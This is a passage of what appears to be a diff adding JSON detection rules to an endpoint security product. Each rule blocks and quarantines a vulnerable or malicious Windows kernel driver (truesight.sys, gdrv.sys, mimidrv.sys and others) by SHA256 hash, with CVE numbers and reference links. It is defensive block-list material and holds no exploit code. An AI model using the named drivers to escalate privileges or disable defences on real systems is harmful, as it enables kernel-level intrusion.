Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f4209b4-0d0a-5225-86cc-ca67dc6022dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979012Z", + "creation_date": "2026-03-23T11:45:29.979014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.979019Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "348679f0f44eb5a50601c48728a5afd2b4312c95eeb7179ce57d447c0d30f873", + "comment": "Vulnerable Kernel Driver (aka PanMonFlt.sys) [https://www.loldrivers.io/drivers/cfdc5cb4-be5c-4dcc-a883-825fa72115b4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f43ed7c-d3d9-56ab-b38b-19ad94fa9f2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979864Z", + "creation_date": "2026-03-23T11:45:29.979865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979885Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a", + "comment": "Malicious Kernel Driver (aka daxin_blank2.sys) [https://www.loldrivers.io/drivers/2e1531b2-d370-4543-9e2e-5319a1c13c22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f446287-ac3d-5d2b-b8c1-d3bf26766a75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608986Z", + "creation_date": "2026-03-23T11:45:29.608988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26c28746e947389856543837aa59a5b1f4697e5721a04d00aa28151a2659b097", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f4d3e27-7cff-54e4-a889-2116b86a4a15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983595Z", + "creation_date": "2026-03-23T11:45:29.983597Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50f9323eaf7c49cfca5890c6c46d729574d0caca89f7acc9f608c8226f54a975", + "comment": "Malicious Kernel Driver (aka ntbios.sys) 
[https://www.loldrivers.io/drivers/eef1fcf4-8c54-420b-8d38-9c5f95129dcc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f505155-6103-5c6d-bd5d-92c4fa4f7d12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825522Z", + "creation_date": "2026-03-23T11:45:30.825524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "320ae8c286e987bf73162993087e9ffe1d7d76df3468a6e5bc7dc197b481b00d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f62ff62-d1f2-5700-8d5a-77941dec1dde", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463614Z", + "creation_date": 
"2026-03-23T11:45:30.463617Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463626Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "897f2bbe81fc3b1ae488114b93f3eb0133a85678d061c7a6f718507971f33736", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f735a58-d1ae-5f3d-8b30-2d72d5b8f047", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145747Z", + "creation_date": "2026-03-23T11:45:31.145749Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145754Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53d919f64c2e4b457b5b5a7b559ec6d9028d9a906adcb600c2b14e186b2e1577", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f780cee-fb6f-59a0-98fe-068da1f231b5", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489162Z", + "creation_date": "2026-03-23T11:45:31.489163Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489169Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ea3f34058bf171564877f8db413350c947c46a962b6b5ee82b400dd0967bcb9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f83a69a-5739-56d9-bc99-abc22179e75a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144615Z", + "creation_date": "2026-03-23T11:45:32.144617Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:32.144622Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f78dd64abcb5a3e1d60f9e9c92422f34a52e009770e6434d2d8aabb6d370737", + "comment": "Vulnerable Kernel Driver (aka RtsUer.sys) [https://www.loldrivers.io/drivers/71d930a7-3465-4d27-90d4-2a1a08bebb92/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fa07ce7-4c6f-5567-bfa4-f863ceda720a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829759Z", + "creation_date": "2026-03-23T11:45:31.829762Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829771Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b04473fe4284519d6eaafdc8a231d6483e91d1532062f37e5b260a6095b4e674", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fa34d84-033a-50d1-8767-7d4cbb94e0d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619177Z", + "creation_date": "2026-03-23T11:45:29.619179Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619184Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "157ce9ae0d09766cfa3e5be8f90e2ac510f0ce3a0bb7cd97e3a5f9aa20c76661", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fb0ebb2-ea1a-5219-9d2d-68efee9ae522", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974504Z", + "creation_date": "2026-03-23T11:45:29.974506Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974512Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "5e71106ee81d050e30afd84cade4ef4a581d70130477aa1e34549e6de50cde87", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fb16975-bd41-5f87-9f48-c4a96fb1bc20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611813Z", + "creation_date": "2026-03-23T11:45:29.611815Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611820Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "539aa921b5352ab385430e1608ac5c0ae36f35e678d471b7a5994ec7c02eadea", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz141_x64.sys) [CVE-2017-15303] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fb4cd51-bfdb-5a6b-b2a8-e4f56f5aa0ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613387Z", + "creation_date": "2026-03-23T11:45:29.613389Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613394Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d20d8bf80017e98b6dfc9f6c3960271fa792a908758bef49a390e2692a2a4341", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fbceaf1-319e-54dc-b64c-711059ba28d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819760Z", + "creation_date": "2026-03-23T11:45:30.819762Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819768Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29f449fca0a41deccef5b0dccd22af18259222f69ed6389beafe8d5168c59e36", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fc93f93-b40f-5555-a33a-2afb21d5d19b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460013Z", + "creation_date": "2026-03-23T11:45:30.460016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460024Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df4e25990742fc8d3aed70f6cb4d402e111e7ed08fa5f76aca685b8c03b98b93", + "comment": "Vulnerable Kernel Driver (aka LgDataCatcher.sys) [https://www.loldrivers.io/drivers/5961e133-ccc3-4530-8f4f-5d975c41028d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fcc44b8-0249-5c7d-8eab-0d8ac8a65ec5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617059Z", + "creation_date": "2026-03-23T11:45:29.617061Z", + "enabled": true, 
+ "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617069Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d259e9b1d04b5fa966094f15f8edbaeba5da2a14bf34bf0a5490a0e308c025d7", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fcdeac3-d35b-5113-82ce-6887000e1663", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827384Z", + "creation_date": "2026-03-23T11:45:31.827386Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827392Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "047e83409fd83837c3566e89079fe840f0f127e2ad77f6a2f6a8ff7b31b4738c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fdc24c4-dc6a-57b6-a94b-9ffab90ebe04", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980202Z", + "creation_date": "2026-03-23T11:45:29.980204Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980210Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46d1dc89cc5fa327e7adf3e3d6d498657240772b85548c17d2e356aac193dd28", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fdd4bd5-7b5b-5a5a-b101-34ac89410b8d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155469Z", + "creation_date": "2026-03-23T11:45:31.155471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155477Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db5fe428d6e069ab0b6d1c33f654144161526eff5fff076bc503f6e0fa153831", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8fe734a2-d6fe-57c6-9d10-5668dd69435b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489091Z", + "creation_date": "2026-03-23T11:45:31.489093Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489099Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24ef9613e5fe416bfef5c49b18ccfa453ab275353fa59950d578e42b1b00bb20", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ff8b760-20a0-5fac-8dde-4e0b6b7b3ea2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461498Z", + "creation_date": "2026-03-23T11:45:30.461501Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461510Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "115034373fc0ec8f75fb075b7a7011b603259ecc0aca271445e559b5404a1406", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "90048c6b-c146-5408-b210-b399da12293c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142344Z", + "creation_date": "2026-03-23T11:45:31.142346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142351Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f6e1d4f8e3d0fe8bc2a087f65a4f6fc26b90e98eb2356cd56a7364f9108604d", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "900bb33c-f029-5a8d-bc71-476abe9820fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143131Z", + "creation_date": "2026-03-23T11:45:32.143133Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143139Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48dc7fd16aacdc8792f8bad1b1f7ca9d675ddac7767e957ea8c4227150d64e2d", + "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "900eee8c-c13b-5f49-b500-b30e4d07a18b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
